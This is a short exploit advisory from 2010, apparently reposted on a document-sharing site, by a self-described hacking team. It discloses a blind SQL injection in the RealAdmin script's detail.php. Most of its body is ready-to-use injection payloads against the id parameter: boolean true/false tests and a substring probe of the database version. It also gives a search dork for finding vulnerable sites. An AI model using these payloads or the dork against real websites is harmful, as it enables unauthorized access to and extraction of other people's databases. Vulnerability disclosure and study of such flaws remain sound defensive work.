Docstoc

RealAdmin detail.php Blind Sql Injection Vulnerability

Document Sample
RealAdmin detail.php Blind Sql Injection Vulnerability Powered By Docstoc
					                           RealAdmin detail.php Blind Sql Injection Vulnerability   Page 1/1
  1    RealAdmin (detail.php) Blind Sql Injection Vulnerability
  2    ========================================================
  3
  4    ####################################################################
  5    .:. Author         : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
  6    .:. Team           : Sec Attack Team
  7    .:. Home           : www.sec−attack.com/vb
  8    .:. Script         : RealAdmin
  9    .:. Download Script: http://www.redcow.ca/products/realadmin/
  10   .:. Bug Type       : Blind Sql Injection
  11   .:. Dork           : "Powered by RealAdmin and Red Cow Technologies, Inc."
  12
  13   ####################################################################
  14
  15   ===[ Exploit ]===
  16
  17   www.site.com/detail.php?id=[Blind SQL INJECTION]
  18
  19
  20   www.site.com/detail.php?id=NULL+and+1=1       >>> True
  21   www.site.com/detail.php?id=NULL+and+1=2       >>> False
  22
  23
  24   www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=5   >>> True
  25   www.site.com/detail.php?id=NULL+and+substring(@@version,1,1)=4   >>> False
  26
  27
  28   ####################################################################
  29
  30   Greats T0: HackxBack & Zero Cold & All My Friend & All Member Sec Attack




AtT4CKxT3rR0r1ST                                                                    02/03/2010

				
DOCUMENT INFO